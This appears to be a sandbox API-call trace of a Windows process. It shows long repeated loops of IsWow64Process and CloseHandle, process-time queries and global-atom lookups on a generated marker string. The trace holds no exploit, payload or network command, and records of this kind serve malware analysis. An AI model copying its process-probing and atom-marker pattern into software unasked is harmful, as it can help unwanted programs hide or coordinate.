	[0121.832] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.832] CloseHandle (hObject=0x698) returned 1
	[0121.904] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.904] CloseHandle (hObject=0x698) returned 1
	[0121.904] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.904] CloseHandle (hObject=0x698) returned 1
	[0121.904] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.905] CloseHandle (hObject=0x698) returned 1
	[0121.905] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.905] CloseHandle (hObject=0x698) returned 1
	[0121.905] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.905] CloseHandle (hObject=0x698) returned 1
	[0121.905] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.905] CloseHandle (hObject=0x698) returned 1
	[0121.905] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.905] CloseHandle (hObject=0x698) returned 1
	[0121.905] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.905] CloseHandle (hObject=0x698) returned 1
	[0121.906] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.906] CloseHandle (hObject=0x698) returned 1
	[0121.906] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.906] CloseHandle (hObject=0x698) returned 1
	[0121.906] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.906] CloseHandle (hObject=0x698) returned 1
	[0121.906] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.906] CloseHandle (hObject=0x698) returned 1
	[0121.906] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.906] CloseHandle (hObject=0x698) returned 1
	[0121.907] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.907] CloseHandle (hObject=0x698) returned 1
	[0121.907] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.907] CloseHandle (hObject=0x698) returned 1
	[0121.907] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.907] CloseHandle (hObject=0x698) returned 1
	[0121.907] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.907] CloseHandle (hObject=0x698) returned 1
	[0121.908] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.908] CloseHandle (hObject=0x698) returned 1
	[0121.908] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.908] CloseHandle (hObject=0x698) returned 1
	[0121.908] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.908] CloseHandle (hObject=0x698) returned 1
	[0121.908] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.908] CloseHandle (hObject=0x698) returned 1
	[0121.908] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.908] CloseHandle (hObject=0x698) returned 1
	[0121.909] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.909] CloseHandle (hObject=0x698) returned 1
	[0121.909] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.909] CloseHandle (hObject=0x698) returned 1
	[0121.909] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.909] CloseHandle (hObject=0x698) returned 1
	[0121.909] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.909] CloseHandle (hObject=0x698) returned 1
	[0121.909] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.910] CloseHandle (hObject=0x698) returned 1
	[0121.910] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.910] CloseHandle (hObject=0x698) returned 1
	[0121.910] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.910] CloseHandle (hObject=0x698) returned 1
	[0121.910] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.910] CloseHandle (hObject=0x698) returned 1
	[0121.910] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.911] CloseHandle (hObject=0x698) returned 1
	[0121.911] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.911] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0121.911] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0121.912] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.912] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0121.912] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.912] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0121.912] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0121.912] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0121.912] CloseHandle (hObject=0x698) returned 1
	[0121.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0121.913] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.913] CloseHandle (hObject=0x698) returned 1
	[0121.913] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.913] CloseHandle (hObject=0x698) returned 1
	[0121.913] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.913] CloseHandle (hObject=0x698) returned 1
	[0121.913] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.913] CloseHandle (hObject=0x698) returned 1
	[0121.945] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.945] CloseHandle (hObject=0x698) returned 1
	[0121.946] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.946] CloseHandle (hObject=0x698) returned 1
	[0121.946] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.946] CloseHandle (hObject=0x698) returned 1
	[0121.946] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.946] CloseHandle (hObject=0x698) returned 1
	[0121.946] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.946] CloseHandle (hObject=0x698) returned 1
	[0121.946] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.946] CloseHandle (hObject=0x698) returned 1
	[0121.947] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.947] CloseHandle (hObject=0x698) returned 1
	[0121.947] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.947] CloseHandle (hObject=0x698) returned 1
	[0121.947] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.947] CloseHandle (hObject=0x698) returned 1
	[0121.947] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.947] CloseHandle (hObject=0x698) returned 1
	[0121.947] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.947] CloseHandle (hObject=0x698) returned 1
	[0121.948] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.948] CloseHandle (hObject=0x698) returned 1
	[0121.948] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.948] CloseHandle (hObject=0x698) returned 1
	[0121.948] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.948] CloseHandle (hObject=0x698) returned 1
	[0121.948] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.948] CloseHandle (hObject=0x698) returned 1
	[0121.948] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.948] CloseHandle (hObject=0x698) returned 1
	[0121.949] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.949] CloseHandle (hObject=0x698) returned 1
	[0121.949] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.949] CloseHandle (hObject=0x698) returned 1
	[0121.949] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.949] CloseHandle (hObject=0x698) returned 1
	[0121.950] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.950] CloseHandle (hObject=0x698) returned 1
	[0121.950] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.950] CloseHandle (hObject=0x698) returned 1
	[0121.950] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.950] CloseHandle (hObject=0x698) returned 1
	[0121.950] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.950] CloseHandle (hObject=0x698) returned 1
	[0121.950] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.950] CloseHandle (hObject=0x698) returned 1
	[0121.951] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.951] CloseHandle (hObject=0x698) returned 1
	[0121.951] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.951] CloseHandle (hObject=0x698) returned 1
	[0121.951] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.951] CloseHandle (hObject=0x698) returned 1
	[0121.951] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.951] CloseHandle (hObject=0x698) returned 1
	[0121.952] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.952] CloseHandle (hObject=0x698) returned 1
	[0121.952] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.952] CloseHandle (hObject=0x698) returned 1
	[0121.952] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.952] CloseHandle (hObject=0x698) returned 1
	[0121.953] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.953] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0121.953] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0121.953] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.953] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0121.954] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.954] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0121.954] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0121.954] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0121.954] CloseHandle (hObject=0x698) returned 1
	[0121.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0121.954] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.954] CloseHandle (hObject=0x698) returned 1
	[0121.954] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.954] CloseHandle (hObject=0x698) returned 1
	[0121.955] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.955] CloseHandle (hObject=0x698) returned 1
	[0121.955] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.955] CloseHandle (hObject=0x698) returned 1
	[0121.988] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.988] CloseHandle (hObject=0x698) returned 1
	[0121.988] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.988] CloseHandle (hObject=0x698) returned 1
	[0121.988] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.988] CloseHandle (hObject=0x698) returned 1
	[0121.988] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.988] CloseHandle (hObject=0x698) returned 1
	[0121.988] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.988] CloseHandle (hObject=0x698) returned 1
	[0121.989] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.989] CloseHandle (hObject=0x698) returned 1
	[0121.989] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.989] CloseHandle (hObject=0x698) returned 1
	[0121.989] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.989] CloseHandle (hObject=0x698) returned 1
	[0121.990] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.990] CloseHandle (hObject=0x698) returned 1
	[0121.990] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.990] CloseHandle (hObject=0x698) returned 1
	[0121.990] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.990] CloseHandle (hObject=0x698) returned 1
	[0121.990] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.990] CloseHandle (hObject=0x698) returned 1
	[0121.990] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.991] CloseHandle (hObject=0x698) returned 1
	[0121.991] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.991] CloseHandle (hObject=0x698) returned 1
	[0121.991] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.991] CloseHandle (hObject=0x698) returned 1
	[0121.991] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.991] CloseHandle (hObject=0x698) returned 1
	[0121.991] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.991] CloseHandle (hObject=0x698) returned 1
	[0121.992] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.992] CloseHandle (hObject=0x698) returned 1
	[0121.992] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.992] CloseHandle (hObject=0x698) returned 1
	[0121.992] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.992] CloseHandle (hObject=0x698) returned 1
	[0121.992] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.992] CloseHandle (hObject=0x698) returned 1
	[0121.992] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.992] CloseHandle (hObject=0x698) returned 1
	[0121.993] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.993] CloseHandle (hObject=0x698) returned 1
	[0121.993] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.993] CloseHandle (hObject=0x698) returned 1
	[0121.993] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.993] CloseHandle (hObject=0x698) returned 1
	[0121.993] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.993] CloseHandle (hObject=0x698) returned 1
	[0121.993] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.001] CloseHandle (hObject=0x698) returned 1
	[0122.001] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.001] CloseHandle (hObject=0x698) returned 1
	[0122.002] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.002] CloseHandle (hObject=0x698) returned 1
	[0122.002] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.002] CloseHandle (hObject=0x698) returned 1
	[0122.002] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.002] CloseHandle (hObject=0x698) returned 1
	[0122.003] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.003] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0122.003] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0122.004] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0122.004] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.004] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0122.004] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.004] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0122.004] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0122.005] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0122.005] CloseHandle (hObject=0x698) returned 1
	[0122.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0122.005] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.005] CloseHandle (hObject=0x698) returned 1
	[0122.005] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.005] CloseHandle (hObject=0x698) returned 1
	[0122.005] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.005] CloseHandle (hObject=0x698) returned 1
	[0122.006] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.006] CloseHandle (hObject=0x698) returned 1
	[0122.081] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.081] CloseHandle (hObject=0x698) returned 1
	[0122.081] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.082] CloseHandle (hObject=0x698) returned 1
	[0122.082] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.082] CloseHandle (hObject=0x698) returned 1
	[0122.082] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.082] CloseHandle (hObject=0x698) returned 1
	[0122.082] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.082] CloseHandle (hObject=0x698) returned 1
	[0122.082] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.082] CloseHandle (hObject=0x698) returned 1
	[0122.082] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.082] CloseHandle (hObject=0x698) returned 1
	[0122.083] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.083] CloseHandle (hObject=0x698) returned 1
	[0122.083] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.083] CloseHandle (hObject=0x698) returned 1
	[0122.083] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.083] CloseHandle (hObject=0x698) returned 1
	[0122.083] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.083] CloseHandle (hObject=0x698) returned 1
	[0122.083] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.084] CloseHandle (hObject=0x698) returned 1
	[0122.084] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.084] CloseHandle (hObject=0x698) returned 1
	[0122.084] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.084] CloseHandle (hObject=0x698) returned 1
	[0122.084] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.084] CloseHandle (hObject=0x698) returned 1
	[0122.084] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.084] CloseHandle (hObject=0x698) returned 1
	[0122.085] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.085] CloseHandle (hObject=0x698) returned 1
	[0122.085] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.085] CloseHandle (hObject=0x698) returned 1
	[0122.085] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.085] CloseHandle (hObject=0x698) returned 1
	[0122.085] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.085] CloseHandle (hObject=0x698) returned 1
	[0122.088] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.088] CloseHandle (hObject=0x698) returned 1
	[0122.088] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.088] CloseHandle (hObject=0x698) returned 1
	[0122.089] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.089] CloseHandle (hObject=0x698) returned 1
	[0122.092] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.092] CloseHandle (hObject=0x698) returned 1
	[0122.092] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.092] CloseHandle (hObject=0x698) returned 1
	[0122.092] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.092] CloseHandle (hObject=0x698) returned 1
	[0122.092] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.092] CloseHandle (hObject=0x698) returned 1
	[0122.092] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.092] CloseHandle (hObject=0x698) returned 1
	[0122.093] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.093] CloseHandle (hObject=0x698) returned 1
	[0122.093] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.093] CloseHandle (hObject=0x698) returned 1
	[0122.093] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.093] CloseHandle (hObject=0x698) returned 1
	[0122.093] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.100] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0122.100] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0122.100] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0122.100] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.101] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0122.101] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.101] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0122.101] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0122.101] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0122.101] CloseHandle (hObject=0x698) returned 1
	[0122.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0122.101] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.102] CloseHandle (hObject=0x698) returned 1
	[0122.102] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.102] CloseHandle (hObject=0x698) returned 1
	[0122.102] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
